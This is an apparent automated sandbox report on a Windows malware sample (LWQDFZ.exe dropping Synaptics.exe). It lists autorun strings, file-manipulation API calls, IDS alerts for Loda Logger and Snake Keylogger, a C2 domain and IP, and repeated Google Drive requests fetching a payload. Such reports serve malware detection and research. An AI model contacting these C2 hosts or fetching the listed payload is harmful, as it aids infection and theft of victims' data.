                              Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.9:49800 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.9:49802 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.186.97:443 -> 192.168.2.9:49806 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.9:49812 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.9:49815 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.9:49827 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.186.97:443 -> 192.168.2.9:49830 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.186.97:443 -> 192.168.2.9:49828 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.9:49833 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.9:49834 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.9:49839 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.9:49840 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.186.97:443 -> 192.168.2.9:49847 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.9:49848 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.9:49849 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.9:49856 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.9:49859 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.9:49866 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.9:49867 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.186.97:443 -> 192.168.2.9:49870 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.186.97:443 -> 192.168.2.9:49872 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.9:49879 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.9:49878 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.9:49884 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.9:49883 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.9:49890 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.9:49889 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.9:49898 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.9:49899 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.9:49907 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.9:49910 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.9:49911 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.9:49913 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.9:49916 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.9:49918 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.186.97:443 -> 192.168.2.9:49931 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.186.97:443 -> 192.168.2.9:49928 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.9:49930 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.9:49929 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.9:49935 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.9:49934 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.186.97:443 -> 192.168.2.9:49936 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.186.97:443 -> 192.168.2.9:49937 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.9:49944 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.9:49945 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.9:49949 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.9:49952 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.186.97:443 -> 192.168.2.9:49956 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.186.97:443 -> 192.168.2.9:49957 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.9:49959 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.9:49966 version: TLS 1.2
                              Source: LWQDFZ.exe, 00000000.00000000.1390370601.0000000000401000.00000020.00000001.01000000.00000003.sdmpBinary or memory string: [autorun]
                              Source: LWQDFZ.exe, 00000000.00000000.1390370601.0000000000401000.00000020.00000001.01000000.00000003.sdmpBinary or memory string: [autorun]
                              Source: LWQDFZ.exe, 00000000.00000000.1390370601.0000000000401000.00000020.00000001.01000000.00000003.sdmpBinary or memory string: autorun.inf
                              Source: Synaptics.exe, 00000003.00000003.1511897808.000000000074E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [autorun]
                              Source: Synaptics.exe, 00000003.00000003.1511897808.000000000074E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [autorun]
                              Source: Synaptics.exe, 00000003.00000003.1511897808.000000000074E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: autorun.inf
                              Source: LWQDFZ.exeBinary or memory string: [autorun]
                              Source: LWQDFZ.exeBinary or memory string: [autorun]
                              Source: LWQDFZ.exeBinary or memory string: autorun.inf
                              Source: C:\Users\user\Desktop\._cache_LWQDFZ.exeCode function: 2_2_003BDD92 GetFileAttributesW,FindFirstFileW,FindClose,2_2_003BDD92
                              Source: C:\Users\user\Desktop\._cache_LWQDFZ.exeCode function: 2_2_003F2044 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,2_2_003F2044
                              Source: C:\Users\user\Desktop\._cache_LWQDFZ.exeCode function: 2_2_003F219F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,2_2_003F219F
                              Source: C:\Users\user\Desktop\._cache_LWQDFZ.exeCode function: 2_2_003F24A9 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,2_2_003F24A9
                              Source: C:\Users\user\Desktop\._cache_LWQDFZ.exeCode function: 2_2_003E6B3F _wcscat,_wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindNextFileW,FindClose,FindClose,2_2_003E6B3F
                              Source: C:\Users\user\Desktop\._cache_LWQDFZ.exeCode function: 2_2_003E6E4A _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,2_2_003E6E4A
                              Source: C:\Users\user\Desktop\._cache_LWQDFZ.exeCode function: 2_2_003EF350 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,2_2_003EF350
                              Source: C:\Users\user\Desktop\._cache_LWQDFZ.exeCode function: 2_2_003EFD47 FindFirstFileW,FindClose,2_2_003EFD47
                              Source: C:\Users\user\Desktop\._cache_LWQDFZ.exeCode function: 2_2_003EFDD2 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,2_2_003EFDD2
                              Source: C:\Users\user\AppData\Roaming\Windata\KQNALS.exeCode function: 9_2_006C2044 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,9_2_006C2044
                              Source: C:\Users\user\AppData\Roaming\Windata\KQNALS.exeCode function: 9_2_006C219F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,9_2_006C219F
                              Source: C:\Users\user\AppData\Roaming\Windata\KQNALS.exeCode function: 9_2_006C24A9 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,9_2_006C24A9
                              Source: C:\Users\user\AppData\Roaming\Windata\KQNALS.exeCode function: 9_2_006B6B3F _wcscat,_wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindNextFileW,FindClose,FindClose,9_2_006B6B3F
                              Source: C:\Users\user\AppData\Roaming\Windata\KQNALS.exeCode function: 9_2_006B6E4A _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,9_2_006B6E4A
                              Source: C:\Users\user\AppData\Roaming\Windata\KQNALS.exeCode function: 9_2_006BF350 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,9_2_006BF350
                              Source: C:\Users\user\AppData\Roaming\Windata\KQNALS.exeCode function: 9_2_006BFD47 FindFirstFileW,FindClose,9_2_006BFD47
                              Source: C:\Users\user\AppData\Roaming\Windata\KQNALS.exeCode function: 9_2_006BFDD2 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,9_2_006BFDD2
                              Source: C:\Users\user\AppData\Roaming\Windata\KQNALS.exeCode function: 9_2_0068DD92 GetFileAttributesW,FindFirstFileW,FindClose,9_2_0068DD92
                              Source: C:\Users\user\Desktop\LWQDFZ.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
                              Source: C:\Users\user\Desktop\LWQDFZ.exeFile opened: C:\Users\user\AppDataJump to behavior
                              Source: C:\Users\user\Desktop\LWQDFZ.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
                              Source: C:\Users\user\Desktop\LWQDFZ.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.iniJump to behavior
                              Source: C:\Users\user\Desktop\LWQDFZ.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Internet ExplorerJump to behavior
                              Source: C:\Users\user\Desktop\LWQDFZ.exeFile opened: C:\Users\userJump to behavior
                              Source: excel.exeMemory has grown: Private usage: 2MB later: 69MB

                              Networking

                              barindex
                              Suricata IDS alerts for network traffic
                              Source: Network trafficSuricata IDS: 2822116 - Severity 1 - ETPRO MALWARE Loda Logger CnC Beacon : 192.168.2.9:49714 -> 172.111.138.100:5552
                              Source: Network trafficSuricata IDS: 2849885 - Severity 1 - ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin : 192.168.2.9:49714 -> 172.111.138.100:5552
                              Source: Network trafficSuricata IDS: 2849885 - Severity 1 - ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin : 192.168.2.9:49858 -> 172.111.138.100:5552
                              Source: Network trafficSuricata IDS: 2832617 - Severity 1 - ETPRO MALWARE W32.Bloat-A Checkin : 192.168.2.9:49717 -> 69.42.215.252:80
                              Source: Network trafficSuricata IDS: 2849885 - Severity 1 - ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin : 192.168.2.9:49810 -> 172.111.138.100:5552
                              Source: Network trafficSuricata IDS: 2849885 - Severity 1 - ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin : 192.168.2.9:49763 -> 172.111.138.100:5552
                              Source: Network trafficSuricata IDS: 2822116 - Severity 1 - ETPRO MALWARE Loda Logger CnC Beacon : 192.168.2.9:49961 -> 172.111.138.100:5552
                              Source: Network trafficSuricata IDS: 2849885 - Severity 1 - ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin : 192.168.2.9:49961 -> 172.111.138.100:5552
                              Source: Network trafficSuricata IDS: 2849885 - Severity 1 - ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin : 192.168.2.9:49900 -> 172.111.138.100:5552
                              Source: Network trafficSuricata IDS: 2849885 - Severity 1 - ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin : 192.168.2.9:49963 -> 172.111.138.100:5552
                              Source: Network trafficSuricata IDS: 2849885 - Severity 1 - ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin : 192.168.2.9:49969 -> 172.111.138.100:5552
                              Source: Network trafficSuricata IDS: 2822116 - Severity 1 - ETPRO MALWARE Loda Logger CnC Beacon : 192.168.2.9:49973 -> 172.111.138.100:5552
                              Source: Network trafficSuricata IDS: 2849885 - Severity 1 - ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin : 192.168.2.9:49973 -> 172.111.138.100:5552
                              Source: Network trafficSuricata IDS: 2849885 - Severity 1 - ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin : 192.168.2.9:49970 -> 172.111.138.100:5552
                              Source: Network trafficSuricata IDS: 2849885 - Severity 1 - ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin : 192.168.2.9:49974 -> 172.111.138.100:5552
                              Source: Network trafficSuricata IDS: 2822116 - Severity 1 - ETPRO MALWARE Loda Logger CnC Beacon : 192.168.2.9:49979 -> 172.111.138.100:5552
                              Source: Network trafficSuricata IDS: 2849885 - Severity 1 - ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin : 192.168.2.9:49980 -> 172.111.138.100:5552
                              Source: Network trafficSuricata IDS: 2849885 - Severity 1 - ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin : 192.168.2.9:49979 -> 172.111.138.100:5552
                              Source: Network trafficSuricata IDS: 2849885 - Severity 1 - ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin : 192.168.2.9:49975 -> 172.111.138.100:5552
                              Source: Network trafficSuricata IDS: 2849885 - Severity 1 - ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin : 192.168.2.9:49947 -> 172.111.138.100:5552
                              Source: Network trafficSuricata IDS: 2849885 - Severity 1 - ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin : 192.168.2.9:49978 -> 172.111.138.100:5552
                              Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.9:49713 -> 142.250.185.78:443
                              Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.9:49724 -> 142.250.185.78:443
                              Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.9:49712 -> 142.250.185.78:443
                              Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.9:49718 -> 142.250.185.78:443
                              Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.9:49749 -> 142.250.185.78:443
                              Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.9:49752 -> 142.250.185.78:443
                              Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.9:49725 -> 142.250.185.78:443
                              Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.9:49762 -> 142.250.185.78:443
                              Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.9:49754 -> 142.250.185.78:443
                              Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.9:49758 -> 142.250.185.78:443
                              Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.9:49742 -> 142.250.185.78:443
                              Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.9:49784 -> 142.250.185.78:443
                              Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.9:49757 -> 142.250.185.78:443
                              Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.9:49769 -> 142.250.185.78:443
                              Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.9:49785 -> 142.250.185.78:443
                              Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.9:49771 -> 142.250.185.78:443
                              Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.9:49744 -> 142.250.185.78:443
                              Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.9:49731 -> 142.250.185.78:443
                              Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.9:49764 -> 142.250.185.78:443
                              Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.9:49787 -> 142.250.185.78:443
                              Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.9:49719 -> 142.250.185.78:443
                              Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.9:49732 -> 142.250.185.78:443
                              Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.9:49747 -> 142.250.185.78:443
                              Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.9:49773 -> 142.250.185.78:443
                              Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.9:49790 -> 142.250.185.78:443
                              Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.9:49772 -> 142.250.185.78:443
                              C2 URLs / IPs found in malware configuration
                              Source: Malware configuration extractorURLs: xred.mooo.com
                              Uses dynamic DNS services
                              Source: unknownDNS query: name: freedns.afraid.org
                              Source: Joe Sandbox ViewIP Address: 172.111.138.100 172.111.138.100
                              Source: Joe Sandbox ViewIP Address: 69.42.215.252 69.42.215.252
                              Source: Joe Sandbox ViewASN Name: VOXILITYGB VOXILITYGB
                              Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
                              Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                              Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                              Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                              Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                              Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                              Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                              Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                              Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                              Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                              Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                              Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                              Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                              Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                              Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                              Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                              Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                              Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                              Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                              Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                              Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                              Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                              Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                              Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                              Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                              Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                              Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                              Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                              Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                              Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                              Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                              Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                              Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                              Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                              Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                              Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                              Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                              Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                              Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                              Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                              Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                              Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                              Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                              Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                              Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                              Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                              Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                              Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                              Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                              Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                              Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                              Source: C:\Users\user\Desktop\._cache_LWQDFZ.exeCode function: 2_2_003F550C InternetReadFile,InternetQueryDataAvailable,InternetReadFile,2_2_003F550C
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=GeADDF2jtnTOSWuNvVSCBUVCQnLIcC2R3xhTPQcEUg_sy0h2efNq5EbCIJwEgYKOk8wak7YBLsqRj7pZl4VgPuwmUExArEOffpmBGDOe1qdVhzzSDux5QFLM1QvX9N7NIVNWVpDS373hXDW_fH-Xz-188HVH7PVlbDTB7CfGt-x6CO33xt-VNJP4
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=GeADDF2jtnTOSWuNvVSCBUVCQnLIcC2R3xhTPQcEUg_sy0h2efNq5EbCIJwEgYKOk8wak7YBLsqRj7pZl4VgPuwmUExArEOffpmBGDOe1qdVhzzSDux5QFLM1QvX9N7NIVNWVpDS373hXDW_fH-Xz-188HVH7PVlbDTB7CfGt-x6CO33xt-VNJP4
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=YU5UUATdZGRfjNE3df9hktSlHAsyYK82OIVAelHq5ywyWWpxY0y42ztEncQDash7G4aWAgXZbrLS9US_8AhP9Cp9hGE_Y1B65SAmpZrF_rspi-yXLIy7yCPeubxya-4mb03LyjTUZB7OTAN_rvMWJA8BgI9vayxofSxXChHajJqhbUxA8KmKhMg
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
